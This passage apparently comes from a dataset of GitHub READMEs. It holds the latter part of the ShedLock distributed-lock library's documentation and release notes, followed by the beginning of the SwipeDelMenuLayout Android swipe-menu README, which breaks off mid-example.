do something - } - return lock; - } -} -``` - -## Duration specification -All the annotations where you need to specify a duration support the following formats - -* duration+unit - `1s`, `5ms`, `5m`, `1d` (Since 4.0.0) -* duration in ms - `100` (only Spring integration) -* ISO-8601 - `PT15M` (see [Duration.parse()](https://docs.oracle.com/javase/8/docs/api/java/time/Duration.html#parse-java.lang.CharSequence-) documentation) - -## Extending the lock -There are some use-cases which require to extend currently held lock. You can use LockExtender in the -following way: - -```java -LockExtender.extendActiveLock(Duration.ofMinutes(5), ZERO); -``` - -Please note that not all lock provider implementations support lock extension. - -## KeepAliveLockProvider -There is also KeepAliveLockProvider that is able to keep the lock alive by periodically extending it. It can be -used by wrapping the original lock provider. My personal opinion is that it should be used only in special cases, -it adds more complexity to the library and the flow is harder to reason about so please use moderately. - -```java -@Bean -public LockProvider lockProvider(...) { - return new KeepAliveLockProvider(new XyzProvider(...), scheduler); -} -``` -KeepAliveLockProvider extends the lock in the middle of the lockAtMostFor interval. For example, if the lockAtMostFor -is 10 minutes the lock is extended every 5 minutes for 10 minutes until the lock is released. Please note that the minimal -lockAtMostFor time supported by this provider is 30s. The scheduler is used only for the lock extension, single thread -should be enough. - -## Micronaut integration -Since version 4.0.0, it's possible to use Micronaut framework for integration - -Import the project: -```xml - - net.javacrumbs.shedlock - - shedlock-micronaut - - - 5.13.0 - -``` - -Configure default lockAtMostFor value (application.yml): -```yaml -shedlock: - defaults: - lock-at-most-for: 1m -``` - -Configure lock provider: -```java -@Singleton -public LockProvider lockProvider() { - ... select and configure your lock provider -} -``` - -Configure the scheduled task: -```java -@Scheduled(fixedDelay = ""1s"") -@SchedulerLock(name = ""myTask"") -public void myTask() { - assertLocked(); - ... -} -``` - -## CDI integration -Since version 5.0.0, it's possible to use CDI for integration (tested only with Quarkus) - -Import the project: -```xml - - net.javacrumbs.shedlock - - shedlock-cdi - 5.13.0 - -``` - -Configure default lockAtMostFor value (application.properties): -```properties -shedlock.defaults.lock-at-most-for=PT30S -``` - -Configure lock provider: -```java -@Produces -@Singleton -public LockProvider lockProvider() { - ... -} -``` - -Configure the scheduled task: -```java -@Scheduled(every = ""1s"") -@SchedulerLock(name = ""myTask"") -public void myTask() { - assertLocked(); - ... -} -``` - -The implementation only depends on `jakarta.enterprise.cdi-api` and `microprofile-config-api` so it should be -usable in other CDI compatible frameworks, but it has not been tested with anything else than Quarkus. It's -built on top of javax annotation as Quarkus has not moved to Jakarta EE namespace yet. - -The support is minimalistic, for example there is no support for expressions in the annotation parameters yet, -if you need it, feel free to send a PR. - -## Locking without a framework -It is possible to use ShedLock without a framework - -```java -LockingTaskExecutor executor = new DefaultLockingTaskExecutor(lockProvider); - -... - -Instant lockAtMostUntil = Instant.now().plusSeconds(600); -executor.executeWithLock(runnable, new LockConfiguration(""lockName"", lockAtMostUntil)); - -``` - -## Extending the lock -Some lock providers support extension of the lock. For the time being, it requires manual lock manipulation, -directly using `LockProvider` and calling `extend` method on the `SimpleLock`. - -## Modes of Spring integration -ShedLock supports two modes of Spring integration. One that uses an AOP proxy around scheduled method (PROXY_METHOD) -and one that proxies TaskScheduler (PROXY_SCHEDULER) - -#### Scheduled Method proxy -Since version 4.0.0, the default mode of Spring integration is an AOP proxy around the annotated method. - -The main advantage of this mode is that it plays well with other frameworks that want to somehow alter the default Spring scheduling mechanism. -The disadvantage is that the lock is applied even if you call the method directly. If the method returns a value and the lock is held -by another process, null or an empty Optional will be returned (primitive return types are not supported). - -Final and non-public methods are not proxied so either you have to make your scheduled methods public and non-final or use TaskScheduler proxy. - -![Method proxy sequenceDiagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/method_proxy.png) - -#### TaskScheduler proxy -This mode wraps Spring `TaskScheduler` in an AOP proxy. **This mode does not play well with instrumentation libraries** -like opentelementry that also wrap TaskScheduler. Please only use it if you know what you are doing. -It can be switched-on like this (PROXY_SCHEDULER was the default method before 4.0.0): - -```java -@EnableSchedulerLock(interceptMode = PROXY_SCHEDULER) -``` - -If you do not specify your task scheduler, a default one is created for you. If you have special needs, just create a bean implementing `TaskScheduler` -interface and it will get wrapped into the AOP proxy automatically. - -```java -@Bean -public TaskScheduler taskScheduler() { - return new MySpecialTaskScheduler(); -} -``` - -Alternatively, you can define a bean of type `ScheduledExecutorService` and it will automatically get used by the tasks -scheduling mechanism. - -![TaskScheduler proxy sequence diagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/scheduler_proxy.png) - -### Spring XML configuration -Spring XML configuration is not supported as of version 3.0.0. If you need it, please use version 2.6.0 or file an issue explaining why it is needed. - -## Lock assert -To prevent misconfiguration errors, like AOP misconfiguration, missing annotation etc., you can assert that the lock -works by using LockAssert: - -```java -@Scheduled(...) -@SchedulerLock(..) -public void scheduledTask() { - // To assert that the lock is held (prevents misconfiguration errors) - LockAssert.assertLocked(); - // do something -} -``` - -In unit tests you can switch-off the assertion by calling `LockAssert.TestHelper.makeAllAssertsPass(true)` on given thread (as in this [example](https://github.com/lukas-krecan/ShedLock/commit/e8d63b7c56644c4189e0a8b420d8581d6eae1443)). - -## Kotlin gotchas -The library is tested with Kotlin and works fine. The only issue is Spring AOP which does not work on final method. If you use `@SchedulerLock` with `@Component` -annotation, everything should work since Kotlin Spring compiler plugin will automatically 'open' the method for you. If `@Component` annotation is not present, you -have to open the method by yourself. (see [this issue](https://github.com/lukas-krecan/ShedLock/issues/1268) for more details) - -## Caveats -Locks in ShedLock have an expiration time which leads to the following possible issues. -1. If the task runs longer than `lockAtMostFor`, the task can be executed more than once -2. If the clock difference between two nodes is more than `lockAtLeastFor` or minimal execution time the task can be -executed more than once. - -## Troubleshooting -Help, ShedLock does not do what it's supposed to do! - -1. Upgrade to the newest version -2. Use [LockAssert](https://github.com/lukas-krecan/ShedLock#lock-assert) to ensure that AOP is correctly configured. - - If it does not work, please read about Spring AOP internals (for example [here](https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#aop-proxying)) -3. Check the storage. If you are using JDBC, check the ShedLock table. If it's empty, ShedLock is not properly configured. -If there is more than one record with the same name, you are missing a primary key. -4. Use ShedLock debug log. ShedLock logs interesting information on DEBUG level with logger name `net.javacrumbs.shedlock`. -It should help you to see what's going on. -5. For short-running tasks consider using `lockAtLeastFor`. If the tasks are short-running, they could be executed one -after another, `lockAtLeastFor` can prevent it. - - -# Release notes -## 5.13.0 (2024-04-05) -* #1779 Ability to rethrow unexpected exception in JdbcTemplateStorageAccessor -* Dependency updates - -## 5.12.0 (2024-02-29) -* #1800 Enable lower case for database type when using usingDbTime() -* #1804 Startup error with Neo4j 5.17.0 -* Dependency updates - -## 4.47.0 (2024-03-01) -* #1800 Enable lower case for database type when using usingDbTime() (thanks @yuagu1) - -## 5.11.0 (2024-02-13) -* #1753 Fix SpEL for methods with parameters -* Dependency updates - -## 5.10.2 (2023-12-07) -* #1635 fix makeAllAssertsPass locks only once -* Dependency updates - -## 5.10.1 (2023-12-06) -* #1635 fix makeAllAssertsPass(false) throws NoSuchElementException -* Dependency updates - -## 5.10.0 (2023-11-07) -* SpannerLockProvider added (thanks @pXius) -* Dependency updates - -## 5.9.1 (2023-10-19) -* QuarkusRedisLockProvider supports Redis 6.2 (thanks @ricardojlrufino) - -## 5.9.0 (2023-10-15) -* Support Quarkus 2 Redis client (thanks @ricardojlrufino) -* Better handling of timeouts in ReactiveStreamsMongoLockProvider -* Dependency updates - -## 5.8.0 (2023-09-15) -* Support for Micronaut 4 -* Use Merge instead of Insert for Oracle #1528 (thanks @xmojsic) -* Dependency updates - -## 5.7.0 (2023-08-25) -* JedisLockProvider supports extending (thanks @shotmk) -* Better behavior when locks are nested #1493 - -## 4.46.0 (2023-09-05) -* JedisLockProvider (version 3) supports extending (thanks @shotmk) - -## 4.45.0 (2023-09-04) -* JedisLockProvider supports extending (thanks @shotmk) - -## 5.6.0 -* Ability to explicitly set database product in JdbTemplateLockProvider (thanks @metron2) -* Removed forgotten versions from BOM -* Dependency updates - -## 5.5.0 (2023-06-19) -* Datastore support (thanks @mmastika) -* Dependency updates - -## 5.4.0 (2023-06-06) -* Handle [uncategorized SQL exceptions](https://github.com/lukas-krecan/ShedLock/pull/1442) (thanks @jaam) -* Dependency updates - -## 5.3.0 (2023-05-13) -* Added shedlock-cdi module (supports newest CDI version) -* Dependency updates - -## 5.2.0 (2023-03-06) -* Uppercase in JdbcTemplateProvider (thanks @Ragin-LundF) -* Dependency updates - -## 5.1.0 (2023-01-07) -* Added SpEL support to @SchedulerLock name attribute (thanks @ipalbeniz) -* Dependency updates - -## 5.0.1 (2022-12-10) -* Work around broken Spring 6 exception translation https://github.com/lukas-krecan/ShedLock/issues/1272 - -## 4.44.0 (2022-12-29) -* Insert ignore for MySQL https://github.com/lukas-krecan/ShedLock/commit/8a4ae7ad8103bb47f55d43bccf043ca261c24d7a - -## 5.0.0 (2022-12-10) -* Requires JDK 17 -* Tested with Spring 6 (Spring Boot 3) -* Micronaut updated to 3.x.x -* R2DBC 1.x.x (still sucks) -* Spring Data 3.x.x -* Rudimentary support for CDI (tested with quarkus) -* New jOOQ lock provider -* SLF4j 2 -* Deleted all deprecated code and support for old versions of libraries - -## 4.43.0 (2022-12-04) -* Better logging in JdbcTemplateProvider -* Dependency updates - -## 4.42.0 (2022-09-16) -* Deprecate old Couchbase lock provider -* Dependency updates - -## 4.41.0 (2022-08-17) -* Couchbase collection support (thanks @mesuutt) -* Dependency updates - -## 4.40.0 (2022-08-11) -* Fixed caching issues when the app is started by the DB does not exist yet (#1129) -* Dependency updates - -## 4.39.0 (2022-07-26) -* Introduced elasticsearch8 LockProvider and deperecated the orignal one (thanks @MarAra) -* Dependency updates - -## 4.38.0 (2022-07-02) -* ReactiveRedisLockProvider added (thanks @ericwcc) -* Dependency updates - -## 4.37.0 (2022-06-14) -* OpenSearch provider (thanks @Pinny3) -* Fix wrong reference to reactive Mongo in BOM #1048 -* Dependency updates - -## 4.36.0 (2022-05-28) -* shedlock-bom module added -* Dependency updates - -## 4.35.0 (2022-05-16) -* Neo4j allows to specify database thanks @SergeyPlatonov -* Dependency updates - -## 4.34.0 (2022-04-09) -* Dropped support for Hazelcast <= 3 as it has unfixed vulnerability -* Dropped support for Spring Data Redis 1 as it is not supported -* Dependency updates - -## 4.33.0 -* memcached provider added (thanks @pinkhello) -* Dependency updates - -## 4.32.0 -* JDBC provider does not change autocommit attribute -* Dependency updates - -## 4.31.0 -* Jedis 4 lock provider -* Dependency updates - -## 4.30.0 -* In-memory lock provider added (thanks @kkocel) -* Dependency updates - -## 4.29.0 -* R2DBC support added (thanks @sokomishalov) -* Library upgrades - -## 4.28.0 -* Neo4j lock provider added (thanks @thimmwork) -* Library upgrades - -## 4.27.0 -* Ability to set transaction isolation in JdbcTemplateLockProvider -* Library upgrades - -## 4.26.0 -* KeepAliveLockProvider introduced -* Library upgrades - -## 4.25.0 -* LockExtender added - -## 4.24.0 -* Support for Apache Ignite (thanks @wirtsleg) -* Library upgrades - -## 4.23.0 -* Ability to set serialConsistencyLevel in Cassandra (thanks @DebajitKumarPhukan) -* Introduced shedlock-provider-jdbc-micronaut module (thanks @drmaas) - -## 4.22.1 -* Catching and logging Cassandra exception - -## 4.22.0 -* Support for custom keyspace in Cassandra provider - -## 4.21.0 -* Elastic unlock using IMMEDIATE refresh policy #422 -* DB2 JDBC lock provider uses microseconds in DB time -* Various library upgrades - -## 4.20.1 -* Fixed DB JDBC server time #378 - -## 4.20.0 -* Support for etcd (thanks grofoli) - -## 4.19.1 -* Fixed devtools compatibility #368 - -## 4.19.0 -* Support for enhanced configuration in Cassandra provider (thanks DebajitKumarPhukan) -* LockConfigurationExtractor exposed as a Spring bean #359 -* Handle CannotSerializeTransactionException #364 - -## 4.18.0 -* Fixed Consul support for tokens and added enhanced Consul configuration (thanks DrWifey) - -## 4.17.0 -* Consul support for tokens - -## 4.16.0 -* Spring - EnableSchedulerLock.order param added to specify AOP proxy order -* JDBC - Log unexpected exceptions at ERROR level -* Hazelcast upgraded to 4.1 - -## 4.15.1 -* Fix session leak in Consul provider #340 (thanks @haraldpusch) - -## 4.15.0 -* ArangoDB lock provider added (thanks @patrick-birkle) - -## 4.14.0 -* Support for Couchbase 3 driver (thanks @blitzenzzz) -* Removed forgotten configuration files form micronaut package (thanks @drmaas) -* Shutdown hook for Consul (thanks @kaliy) - -## 4.13.0 -* Support for Consul (thanks @kaliy) -* Various dependencies updated -* Deprecated default LockConfiguration constructor - -## 4.12.0 -* Lazy initialization of SqlStatementsSource #258 - -## 4.11.1 -* MongoLockProvider uses mongodb-driver-sync -* Removed deprecated constructors from MongoLockProvider - -## 4.10.1 -* New Mongo reactive streams driver (thanks @codependent) - -## 4.9.3 -* Fixed JdbcTemplateLockProvider useDbTime() locking #244 thanks @gjorgievskivlatko - -## 4.9.2 -* Do not fail on DB type determining code if DB connection is not available - -## 4.9.1 -* Support for server time in DB2 -* removed shedlock-provider-jdbc-internal module - -## 4.9.0 -* Support for server time in JdbcTemplateLockProvider -* Using custom non-null annotations -* Trimming time precision to milliseconds -* Micronaut upgraded to 1.3.4 -* Add automatic DB tests for Oracle, MariaDB and MS SQL. - -## 4.8.0 -* DynamoDB 2 module introduced (thanks Mark Egan) -* JDBC template code refactored to not log error on failed insert in Postgres - * INSERT .. ON CONFLICT UPDATE is used for Postgres - -## 4.7.1 -* Make LockAssert.TestHelper public - -## 4.7.0 -* New module for Hazelcasts 4 -* Ability to switch-off LockAssert in unit tests - -## 4.6.0 -* Support for Meta annotations and annotation inheritance in Spring - -## 4.5.2 -* Made compatible with PostgreSQL JDBC Driver 42.2.11 - -## 4.5.1 -* Inject redis template - -## 4.5.0 -* ClockProvider introduced -* MongoLockProvider(MongoDatabase) introduced - -## 4.4.0 -* Support for non-void returning methods when PROXY_METHOD interception is used - -## 4.3.1 -* Introduced shedlock-provider-redis-spring-1 to make it work around Spring Data Redis 1 issue #105 (thanks @rygh4775) - -## 4.3.0 -* Jedis dependency upgraded to 3.2.0 -* Support for JedisCluster -* Tests upgraded to JUnit 5 - -## 4.2.0 -* Cassandra provider (thanks @mitjag) - -## 4.1.0 -* More configuration option for JdbcTemplateProvider - -## 4.0.4 -* Allow configuration of key prefix in RedisLockProvider #181 (thanks @krm1312) - -## 4.0.3 -* Fixed junit dependency scope #179 - -## 4.0.2 -* Fix NPE caused by Redisson #178 -## 4.0.1 -* DefaultLockingTaskExecutor made reentrant #175 -## 4.0.0 -Version 4.0.0 is a major release changing quite a lot of stuff -* `net.javacrumbs.shedlock.core.SchedulerLock` has been replaced by `net.javacrumbs.shedlock.spring.annotation.SchedulerLock`. The original annotation has been in wrong module and -was too complex. Please use the new annotation, the old one still works, but in few years it will be removed. -* Default intercept mode changed from `PROXY_SCHEDULER` to `PROXY_METHOD`. The reason is that there were a lot of issues with `PROXY_SCHEDULER` (for example #168). You can still -use `PROXY_SCHEDULER` mode if you specify it manually. -* Support for more readable [duration strings](#duration-specification) -* Support for lock assertion `LockAssert.assertLocked()` -* [Support for Micronaut](#micronaut-integration) added - -## 3.0.1 -* Fixed bean definition configuration #171 - -## 3.0.0 -* `EnableSchedulerLock.mode` renamed to `interceptMode` -* Use standard Spring AOP configuration to honor Spring Boot config (supports `proxyTargetClass` flag) -* Removed deprecated SpringLockableTaskSchedulerFactoryBean and related classes -* Removed support for XML configuration - -## 2.6.0 -* Updated dependency to Spring 2.1.9 -* Support for lock extensions (beta) - -## 2.5.0 -* Zookeeper supports *lockAtMostFor* and *lockAtLeastFor* params -* Better debug logging - -## 2.4.0 -* Fixed potential deadlock in Hazelcast (thanks @HubertTatar) -* Finding class level annotation in proxy method mode (thanks @volkovs) -* ScheduledLockConfigurationBuilder deprecated - -## 2.3.0 -* LockProvides is initialized lazilly so it does not change DataSource initialization order - -## 2.2.1 -* MongoLockProvider accepts MongoCollection as a constructor param - -## 2.2.0 -* DynamoDBLockProvider added - -## 2.1.0 -* MongoLockProvider rewritten to use upsert -* ElasticsearchLockProvider added - -## 2.0.1 -* AOP proxy and annotation configuration support - -## 1.3.0 -* Can set Timezone to JdbcTemplateLock provider - -## 1.2.0 -* Support for Couchbase (thanks to @MoranVaisberg) - -## 1.1.1 -* Spring RedisLockProvider refactored to use RedisTemplate - -## 1.1.0 -* Support for transaction manager in JdbcTemplateLockProvider (thanks to @grmblfrz) - -## 1.0.0 -* Upgraded dependencies to Spring 5 and Spring Data 2 -* Removed deprecated net.javacrumbs.shedlock.provider.jedis.JedisLockProvider (use net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvide instead) -* Removed deprecated SpringLockableTaskSchedulerFactory (use ScheduledLockConfigurationBuilder instead) - -## 0.18.2 -* ablility to clean lock cache - -## 0.18.1 -* shedlock-provider-redis-spring made compatible with spring-data-redis 1.x.x - -## 0.18.0 -* Added shedlock-provider-redis-spring (thanks to @siposr) -* shedlock-provider-jedis moved to shedlock-provider-redis-jedis - -## 0.17.0 -* Support for SPEL in lock name annotation - -## 0.16.1 -* Automatically closing TaskExecutor on Spring shutdown - -## 0.16.0 -* Removed spring-test from shedlock-spring compile time dependencies -* Added Automatic-Module-Names - -## 0.15.1 -* Hazelcast works with remote cluster - -## 0.15.0 -* Fixed ScheduledLockConfigurationBuilder interfaces #32 -* Hazelcast code refactoring - -## 0.14.0 -* Support for Hazelcast (thanks to @peyo) - -## 0.13.0 -* Jedis constructor made more generic (thanks to @mgrzeszczak) - -## 0.12.0 -* Support for property placeholders in annotation lockAtMostForString/lockAtLeastForString -* Support for composed annotations -* ScheduledLockConfigurationBuilder introduced (deprecating SpringLockableTaskSchedulerFactory) - -## 0.11.0 -* Support for Redis (thanks to @clamey) -* Checking that lockAtMostFor is in the future -* Checking that lockAtMostFor is larger than lockAtLeastFor - - -## 0.10.0 -* jdbc-template-provider does not participate in task transaction - -## 0.9.0 -* Support for @SchedulerLock annotations on proxied classes - -## 0.8.0 -* LockableTaskScheduler made AutoClosable so it's closed upon Spring shutdown - -## 0.7.0 -* Support for lockAtLeastFor - -## 0.6.0 -* Possible to configure defaultLockFor time so it does not have to be repeated in every annotation - -## 0.5.0 -* ZooKeeper nodes created under /shedlock by default - -## 0.4.1 -* JdbcLockProvider insert does not fail on DataIntegrityViolationException - -## 0.4.0 -* Extracted LockingTaskExecutor -* LockManager.executeIfNotLocked renamed to executeWithLock -* Default table name in JDBC lock providers - -## 0.3.0 -* `@ShedlulerLock.name` made obligatory -* `@ShedlulerLock.lockForMillis` renamed to lockAtMostFor -* Adding plain JDBC LockProvider -* Adding ZooKeepr LockProvider -",0 -mcxtzhang/SwipeDelMenuLayout,"The most simple SwipeMenu in the history, 0 coupling, support any ViewGroup. Step integration swipe (delete) menu, high imitation QQ, iOS. ~史上最简单侧滑菜单,0耦合,支持任意ViewGroup。一步集成侧滑(删除)菜单,高仿QQ、IOS。~",2016-08-25T08:10:45Z,,"# SwipeDelMenuLayout -[![](https://jitpack.io/v/mcxtzhang/SwipeDelMenuLayout.svg)](https://jitpack.io/#mcxtzhang/SwipeDelMenuLayout) - -#### [中文版文档](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/README-cn.md) - -Related blog: -V1.0: -http://blog.csdn.net/zxt0601/article/details/52303781 - -V1.2: -http://blog.csdn.net/zxt0601/article/details/53157090 - -If you like,please give me a star, thank you very much -## Where to find me: -Github: - -https://github.com/mcxtzhang - -CSDN: - -http://blog.csdn.net/zxt0601 - -gold.xitu.io: - -http://gold.xitu.io/user/56de210b816dfa0052e66495 - -jianshu: - -http://www.jianshu.com/users/8e91ff99b072/timeline - -*** -# Important words: not for the RecyclerView or ListView, for the Any ViewGroup. - -# Intro - -This control has since rolled out in the project use over the past seven months, distance on a push to making it the first time, also has + 2 month. (before, I published an article. Portal: http://gold.xitu.io/entry/57d1115dbf22ec005f9593c6/detail, it describes in detail the control how V1.0 version is done.) -During a lot of friends in the comment, put forward some improvement of ** in the issue, such as support setting sliding direction (or so), high imitation QQ interaction, support GridLayoutManager etc, as well as some bug **. I have been all real, repair **. And its packaging to jitpack, introducing more convenient**. Compared to the first edition, change a lot. So to arrange, new version. -So this paper start with how to use it, and then introduces the features of it contains, in support of the property. Finally a few difficulties and conflict resolution. - -ItemDecorationIndexBar + SwipeMenuLayout -(The biggest charm is 0 coupling at the controls,So, you see first to cooperate with me another library assembly effect): -(ItemDecorationIndexBar : https://github.com/mcxtzhang/ItemDecorationIndexBar) - -![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/ItemDecorationIndexBar_SwipeDel.gif) - -Casually to use in a flow layout also easy: - -![](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/FlowSwipe.gif) - - -Android Special Version (Without blocking type, when the lateral spreads menus, still can be expanded to other side menu, at the same time on a menu will automatically shut down): - -![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/LinearLayoutManager1.gif) - -GridLayoutManager (And the above code than, need to modify RecyclerView LayoutManager): - -![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/grid.gif) - -LinearLayout (Without any modification, even can simple LinearLayout implementation side menu): - -![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/linear.gif) - -iOS interaction (Block type interaction, high imitation QQ, sideslip menu expansion, blocking other ITEM all operations): - -![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/iOS.gif) - -use in ViewPager: -![image](https://github.com/mcxtzhang/SwipeDelMenuLayout/blob/master/gif/viewpager.gif) - - - - -# Usage: -Step 1. Add the JitPack repository to your build file。 -Add it in your root build.gradle at the end of repositories: -``` - allprojects { - repositories { - ... - maven { url ""https://jitpack.io"" } - } - } -``` -Step 2. Add the dependency -``` - dependencies { - compile 'com.github.mcxtzhang:SwipeDelMenuLayout:V1.3.0' - } -``` - - -Step 3. Outside the need sideslip delete ContentItem on the controls, within the control lined ContentItem, menu: -**At this point You can use high copy IOS, QQ sideslip delete menu functions** -(Sideslip menu click events is by setting the id to get, in line with other controls, no longer here) - -Demo, I ContentItem is a TextView, then I'm in the outside its nested controls, and order, in the side menu, in turn, can arrange menu controls. -``` - - - - - - -